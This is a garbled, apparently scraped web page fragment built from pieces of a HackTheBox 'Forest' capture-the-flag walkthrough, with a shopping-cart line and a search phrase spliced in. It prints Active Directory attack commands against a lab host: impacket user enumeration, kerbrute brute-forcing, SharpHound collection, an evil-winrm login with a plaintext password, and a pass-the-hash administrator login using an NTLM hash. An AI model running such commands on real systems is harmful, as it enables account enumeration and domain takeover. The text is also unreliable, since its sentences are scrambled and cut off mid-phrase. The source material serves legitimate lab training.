Your cart is currently empty.
impacket-GetADUsers -dc-ip 10.10.10.161 htb.local/ Alternatively, use kerbrute to brute usernames from a wordlist:
whoami /all net user svc-alfresco We see the user belongs to Service Accounts and Privileged IT Accounts , but more importantly, we need to check group memberships recursively. Upload SharpHound.exe or use BloodHound.py from Kali: forest hackthebox walkthrough best
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90f43dfa1e816ec0a1c8 Now list the root directory: impacket-GetADUsers -dc-ip 10
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice We are now in a limited shell. Navigate to the desktop: but more importantly